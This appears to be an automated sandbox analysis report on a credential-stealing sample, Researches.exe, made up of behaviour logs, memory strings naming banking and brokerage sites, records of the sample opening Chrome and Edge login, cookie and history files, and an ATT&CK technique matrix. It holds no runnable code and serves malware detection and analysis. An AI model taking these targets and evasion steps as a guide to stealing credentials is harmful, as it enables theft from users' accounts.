          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598287s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598172s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -598063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597938s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597813s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597358s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597249s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597141s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -597029s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -596922s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -596702s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -596516s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -596390s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -596266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -596081s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595953s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595844s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595172s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -595063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594938s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594828s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594594s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594485s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594360s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594235s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -594110s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exe TID: 7016Thread sleep time: -593985s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_00402706 FindFirstFileW,11_2_00402706
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405731
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_004061E5 FindFirstFileW,FindClose,11_2_004061E5
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599655Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599313Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599188Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 599078Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598969Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598844Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598734Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598625Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598406Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598287Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597469Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597358Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597249Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 597029Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596922Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596702Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596516Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596390Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 596081Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595953Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595844Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595719Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595391Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595281Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595172Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 595063Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594938Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594828Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeThread delayed: delay time: 593985Jump to behavior
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3519987420.000000000319F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`|
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\Researches.exeAPI call chain: ExitProcess graph end nodegraph_0-4472
          Source: C:\Users\user\Desktop\Researches.exeAPI call chain: ExitProcess graph end nodegraph_0-4471
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
          Source: C:\Users\user\Desktop\Researches.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeProcess created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Users\user\Desktop\Researches.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405EC4
          Source: C:\Users\user\Desktop\Researches.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Researches.exe PID: 6308, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeDirectory queried: number of queries: 1001
          Source: Yara matchFile source: Process Memory Space: Researches.exe PID: 6308, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Researches.exe PID: 6308, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          11
          Process Injection
          11
          Masquerading
          1
          OS Credential Dumping
          21
          Security Software Discovery
          Remote Services1
          Email Collection
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory31
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Application Window Discovery
          SMB/Windows Admin Shares1
          Data from Local System
          3
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection
          NTDS1
          System Network Configuration Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets13
          File and Directory Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information
          Cached Domain Credentials215
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.